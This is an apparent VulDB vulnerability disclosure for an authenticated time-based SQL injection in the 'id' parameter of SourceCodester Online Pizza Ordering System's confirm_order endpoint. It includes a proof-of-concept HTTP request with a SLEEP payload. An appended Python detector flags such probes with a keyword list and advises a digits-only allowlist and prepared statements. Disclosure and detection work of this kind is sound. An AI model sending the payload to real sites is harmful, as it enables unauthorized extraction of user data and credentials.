| Title | SourceCodester Online Pizza Ordering System SQL Injection via 'confirm_order' |
|---|---|

Description:

Affected Software:
SourceCodester Online Pizza Ordering System v1.0
https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html#comment-103391

Tested On:
Ubuntu Server 22.04.3 LTS

Affected URL:
http://x.x.x.x/php-opos/admin/ajax.php?action=confirm_order

Request:

```http
POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 5
Origin: http://x.x.x.x
Connection: close
Referer: http://x.x.x.x/php-opos/admin/index.php?page=orders
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxx

id=1
```

Affected Parameter:
id

Proof of Concept:

```http
POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 5
Origin: http://x.x.x.x
Connection: close
Referer: http://x.x.x.x/php-opos/admin/index.php?page=orders
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxx

id=1 AND (SELECT 5605 FROM (SELECT(SLEEP(15)))UTXE)
```

Impact:
A SQL injection vulnerability can result in unauthorized access to restricted data such as user information and credentials.

Summary:
An authenticated remote SQL injection vulnerability exists in the SourceCodester Online Pizza Ordering System v1.0. The vulnerability is present in a POST request to the /admin/ajax.php?action=confirm_order page via the 'view order' functionality in /admin/index.php?page=orders. Due to improper input sanitization, a specially crafted packet that manipulates the 'id' parameter in the POST request leads to an SQL injection vulnerability, allowing malicious actors to view restricted data and extract the underlying database.

| User | simon.davis8080 (UID 54983) |
|---|---|
| Submission | 05/10/2023 10h30 (3 years ago) |
| Moderation | 05/10/2023 12h01 (2 hours later) |
| Status | Accepted |
| VulDB Entry | 241384 [SourceCodester Online Pizza Ordering System 1.0 ajax.php?action=confirm_order ID SQL Injection] |
| Points | 17 |
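As an added defender-side example (not part of the submission and not code from the Online Pizza Ordering System), the following Python snippet applies the digits-only allowlist the fixed confirm_order endpoint should enforce on `id`, and flags confirm_order requests whose `id` carries a probe like the one in the proof of concept. The request records, the marker list and the function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample records (request line, POST body) modelled on the
# advisory's request and proof of concept; not captured traffic.
SAMPLE_REQUESTS = [
    ("POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1", "id=1"),
    ("POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1",
     "id=1 AND (SELECT 5605 FROM (SELECT(SLEEP(15)))UTXE)"),
    ("POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1", "id=12'"),
    ("POST /php-opos/admin/ajax.php?action=save_order HTTP/1.1", "id=7&qty=2"),
]

# Allowlist the hardened endpoint should enforce before touching the database:
# an order id is a short run of digits and nothing else.
STRICT_ID = re.compile(r"^[0-9]{1,10}$")
# Tokens typical of time-based or union probing; a genuine id never contains them.
SQLI_MARKERS = re.compile(r"\b(sleep|benchmark|select|union|waitfor)\b", re.IGNORECASE)


def id_is_strictly_numeric(value: str) -> bool:
    """True when `value` is acceptable as an order id (digits only)."""
    return STRICT_ID.match(value) is not None


def classify_request(request_line: str, body: str):
    """Return None for clean traffic, otherwise a short alert reason (confirm_order only)."""
    parts = request_line.split(" ")
    if len(parts) != 3 or parts[0] != "POST":
        return None
    target = urlparse(parts[1])
    if not target.path.endswith("/ajax.php"):
        return None
    if parse_qs(target.query).get("action") != ["confirm_order"]:
        return None
    for raw_id in parse_qs(body, keep_blank_values=True).get("id", []):
        if id_is_strictly_numeric(raw_id):
            continue
        markers = sorted({m.upper() for m in SQLI_MARKERS.findall(raw_id)})
        if markers:
            return "sql-injection probe in id (%s)" % ", ".join(markers)
        return "non-numeric id"
    return None


def scan(records):
    """Collect (body, reason) for every flagged confirm_order request."""
    return [(body, reason) for line, body in records
            if (reason := classify_request(line, body)) is not None]
```

The same allowlist check, applied server-side before the id reaches the query (or, better, binding the id as an integer parameter in a prepared statement), is the fix; the log scan only tells you whether anyone has been probing the endpoint.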